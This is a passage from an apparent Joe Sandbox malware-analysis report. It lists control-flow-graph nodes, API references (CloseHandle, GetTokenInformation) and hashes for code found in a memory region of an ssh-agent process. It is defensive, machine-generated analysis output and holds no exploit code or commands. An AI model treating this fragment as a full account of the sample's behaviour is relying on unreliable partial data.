702 8f83d0 655->702 656->659 666 901665 656->666 657->659 665 90172d 657->665 660 901620-901623 659->660 661 9015d4-9015d6 659->661 674 9016a0-9016b4 660->674 675 901625-901628 660->675 672 901670-901684 661->672 673 9015dc-9015df 661->673 678 8f8390-8f8393 663->678 665->658 666->658 687 8f81eb 669->687 688 8f82a3-8f82a5 669->688 670->669 679 8f8328-8f832c 670->679 672->635 684 90168a-90168d 672->684 673->653 680 9015e1-9015f6 673->680 689 9016f4-9016f5 674->689 690 9016b6-9016b9 674->690 675->653 681 90162a-901636 675->681 676->677 682 8f8240 676->682 685 8f827e 678->685 686 8f8399 678->686 679->607 679->619 696 9016d2-9016d7 680->696 697 9015fc-901600 680->697 681->651 699 9016dc-9016ec 681->699 700 90b32e-90b330 682->700 703 901693-901697 684->703 704 90172f-901738 684->704 685->620 698 8f8284 685->698 686->685 705 8f839f-8f83a1 686->705 694 8f82b2-8f836f GetTokenInformation 687->694 695 8f81f1 687->695 688->609 706 8f82ab 688->706 710 9016fe-90170c 689->710 691 90173a-90173b 690->691 692 9016bb 690->692 711 90173f-901740 691->711 707 9016bf-9016cd 692->707 723 8f8376-8f837b 694->723 695->694 712 8f81f7 695->712 696->640 697->710 715 901606-901618 697->715 698->619 699->659 709 9016f2 699->709 717 90b300 700->717 718 90b332-90b337 call 9272f4 700->718 713 8f827c 701->713 714 8f8241 701->714 702->701 716 8f83d6 702->716 703->707 704->711 705->628 706->609 719 8f82b1 706->719 709->658 720 901744-901748 710->720 711->720 721 8f828e 712->721 713->685 713->714 714->649 714->723 715->646 726 90b302 717->726 727 90b2fd 717->727 718->717 729 90b339 718->729 719->694 721->611 723->645 728 8f8381 723->728 730 90b305 727->730 731 90b2ff 727->731 728->645 732 8f8387 728->732 729->717 733 90b33b-90b33f 729->733 734 90b322-90b32d 730->734 735 90b308-90b315 730->735 731->735 732->678 732->701 733->735 734->700 735->730 737 90b317 735->737 737->727
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000015.00000002.3347839688.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_21_2_8f0000_ssh-agent.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseHandle
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2962429428-0
                                                                                                                                                                                • Opcode ID: 503c1ad91aea7a5e0fd56d7a1d992a80918f029766c32a84f283e1e6ddad448d
                                                                                                                                                                                • Instruction ID: 94234a95a69fb22203bf323119f0a60a5c7675fcb6aa520f031b41931420f362
                                                                                                                                                                                • Opcode Fuzzy Hash: 503c1ad91aea7a5e0fd56d7a1d992a80918f029766c32a84f283e1e6ddad448d
                                                                                                                                                                                • Instruction Fuzzy Hash: 2CF06D3552894DCB87298634844053A6760FF51798F7C106AD746CA623CE34FC01E752
                                                                                                                                                                                Function 008F8318 Relevance: 1.3, APIs: 1, Instructions: 36COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 474 8f8318-8f831c 475 8f81e5 474->475 476 8f8322 474->476 478 8f81eb 475->478 479 8f82a3-8f82a5 475->479 476->475 477 8f8328-8f832c 476->477 480 8f832e-8f8330 477->480 481 8f82c5-8f82c8 477->481 484 8f82b2-8f836f GetTokenInformation 478->484 485 8f81f1 478->485 482 8f82ab 479->482 483 8f83f9 479->483 491 8f82dd-8f82e3 480->491 492 8f8332 480->492 481->483 488 8f82ce 481->488 482->483 493 8f82b1 482->493 489 8f83ff 483->489 490 8f82d2-8f82d7 483->490 505 8f8376-8f837b 484->505 485->484 486 8f81f7-8f828e 485->486 495 8f828f-8f8303 call 9272ec 486->495 488->495 496 8f82d0 488->496 497 8ff524-8ff52e 489->497 500 8f8306-8f8309 490->500 498 8f82e9 491->498 499 8f83a3-8f83a4 491->499 492->491 501 8f8334 492->501 493->484 495->500 518 8f834f-8f8355 495->518 496->490 496->495 502 8ff807 497->502 498->499 503 8f82ef 498->503 500->480 504 8f830b-8f8311 CloseHandle 500->504 501->497 507 8ff8df-8ff8e0 502->507 508 8ff80d 502->508 510 8f82f0-8f831c 503->510 504->480 509 8f8381 505->509 505->510 517 9015a5-9015aa 507->517 508->507 512 8ff813 508->512 509->510 514 8f8387 509->514 510->475 510->476 523 8ff78f 512->523 524 8ff81b 512->524 519 8f8277-8f827a 514->519 520 8f8390-8f8393 514->520 526 9015ae-9015af 517->526 531 8f8212-8f821a GetTokenInformation 518->531 532 8f8341 518->532 521 8f827c 519->521 522 8f8241 519->522 527 8f827e 520->527 528 8f8399 520->528 521->522 521->527 522->505 534 8f8251-8f8260 call 9272f4 522->534 523->524 530 8ff795 523->530 524->507 535 9015b2-9015b7 526->535 527->504 533 8f8284 527->533 528->527 536 8f839f-8f83a1 528->536 530->502 537 8f83af 531->537 538 8f8220-8f8234 531->538 532->531 539 8f8347 532->539 533->480 534->520 541 9015ba-9015c1 535->541 536->499 537->534 543 8f83b5 537->543 565 8f823a 538->565 566 8f83d7-8f83dd 538->566 544 8f834d 539->544 545 901638-901640 539->545 547 901750-9017a2 call 9272f4 541->547 548 9015c7-9015d2 541->548 543->534 551 8f83bb-8f83ca 543->551 544->518 552 901646-90165f 545->552 553 90170e-901727 545->553 549 901620-901623 548->549 550 9015d4-9015d6 548->550 559 9016a0-9016b4 549->559 560 901625-901628 549->560 556 901670-901684 550->556 557 9015dc-9015df 550->557 551->519 586 8f83d0 551->586 552->548 563 901665 552->563 553->548 562 90172d 553->562 556->517 568 90168a-90168d 556->568 557->541 564 9015e1-9015f6 557->564 569 9016f4-9016f5 559->569 570 9016b6-9016b9 559->570 560->541 567 90162a-901636 560->567 562->547 563->547 573 9016d2-9016d7 564->573 574 9015fc-901600 564->574 565->566 575 8f8240 565->575 567->545 576 9016dc-9016ec 567->576 578 901693-901697 568->578 579 90172f-901738 568->579 583 9016fe-90170c 569->583 571 90173a-90173b 570->571 572 9016bb 570->572 587 90173f-901740 571->587 580 9016bf-9016cd 572->580 573->526 582 901606-901618 574->582 574->583 585 90b32e-90b330 575->585 576->548 584 9016f2 576->584 578->580 579->587 582->535 588 901744-901748 583->588 584->547 590 90b300 585->590 591 90b332-90b337 call 9272f4 585->591 586->519 589 8f83d6 586->589 587->588 595 90b302 590->595 596 90b2fd 590->596 591->590 597 90b339 591->597 598 90b305 596->598 599 90b2ff 596->599 597->590 600 90b33b-90b33f 597->600 601 90b322-90b32d 598->601 602 90b308-90b315 598->602 599->602 600->602 601->585 602->598 604 90b317 602->604 604->596
                                                                                                                                                                                APIs
                                                                                                                                                                                • CloseHandle.KERNELBASE ref: 008F830B
                                                                                                                                                                                • GetTokenInformation.KERNELBASE ref: 008F8369
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000015.00000002.3347839688.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_21_2_8f0000_ssh-agent.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseHandleInformationToken
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3954737543-0
                                                                                                                                                                                • Opcode ID: 77a015f8ebc331779973eb2bd4a9dafca6344b1b5edfd1b30c85a8ef24a0a0c6
                                                                                                                                                                                • Instruction ID: 81d52339b486974d25125c456aed15e9bcce767850a66c707880b3af1756e7b5
                                                                                                                                                                                • Opcode Fuzzy Hash: 77a015f8ebc331779973eb2bd4a9dafca6344b1b5edfd1b30c85a8ef24a0a0c6
                                                                                                                                                                                • Instruction Fuzzy Hash: 9DF06D3442964DCB8B258A34885053577A0FF21798F78016AD746CA223CE24ED42EB62